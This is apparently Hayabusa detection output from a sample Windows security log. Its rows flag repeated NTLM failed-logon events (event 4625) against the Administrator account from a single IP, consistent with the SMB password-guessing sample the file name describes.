01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XmbuuymdSpfNldt2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yqJarBVOImq5Tn2p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BZYExQroYH65tPuG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: llU5DQBrIrV3VtG5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HV17iXOYQqs2ntax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esZnEeyGdPa22PsL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rlYFTP9a2wdi5A2n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oJifU0PnO1Ntp6z3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGKdKjJy28Qd1whT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x3L4BYjYJYlvuYHE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ui5RoLKttDo0wfFJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G2xjdWobsxBjo6p7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TPeQ0M5lXITI84G3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uu72qx4lG5ZRM7xf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zD072YR1hIgbzjaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EqA7HDvImIlCiFq2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: efYFxZwMGEC3vVi7 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6WmMHYegvFJvv6zd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DS9WkRnP0B5MgaeX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5jNPV7ZgFExgg9n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1FJ6vm3wK97iual : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GLuIx0sfF8NQD8QY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y3lMvcrrmGTkjdlh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ZqOabcNMeazs6TC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2AbE9D8PvuFDBz5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wzWdLEEc68ZvviGh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AtV3BuZiljbAeikO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tnKKfcwikNDdYOam : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jSbbzD7fpJY4Q1JL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gOASpLLE25ruCnGW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1jhUGOtszbPUwccL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yB8Mzo1RppdpLFKS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rOwoUlHGVeSbAhuN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BXIEHbkrjwedeaih : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OvsKoixgEzUgAyie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TzaZe6Y4Tdfjseuk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FEmbuU3CAC3CecZy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kfBmqmVPd0CGVUsD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Uz3TlU6yrcveM1w : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z6hH6AkkgBFmeZ6u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J2J1W2WhA6Pj7j5j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: soHOxnkoOn7ot0My : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4c2oWI6mRIvSVSKq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FKsXD8aTyaC4fBqq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qrzji5ucmutsZNpo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BApOU105FCLwj4zn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EO50f7NfrrdwwCNA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PfTYbWC8IjW87th8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wLnE6zm5US4maK04 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5AV7taC7hYQdVjAj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8MnnaSRs0bnYVlMX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YgqavZ1SuNvX7RgH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IQvoIsfW0LhDit2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 33IPGQXc1MarY30J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: II4Ly9LnkWlq60Ux : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wncfJC7kDSI7O9Ud : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6XzbWef3PuzQK3FJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5M5670HdNC6c8O56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ea8FcddgLyV5o6oL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LjyhmKFdBNrHIvTJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PIF47pEWBMp6Nbym : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6TO891WvJPkdjsct : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6cLnJYpHEzGAvhWG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gy6cFTrwrpRQFxfQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gxz612Z88PMCKzAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GSPC8hibdZdyOcex : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6vlmykLeFmuhn81B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4w4lEW9w53zMFPcc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jt2lDRFWwi6adwlB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G9MGvle35u5OGB5o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJgLFM2vrnKuj5N3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8HRyDAzwKj9bfnA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J65LcwnRgEob9wjY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yhas9e1fwDZ1Fxvt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5qJRSpjS6tZJjNQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.268 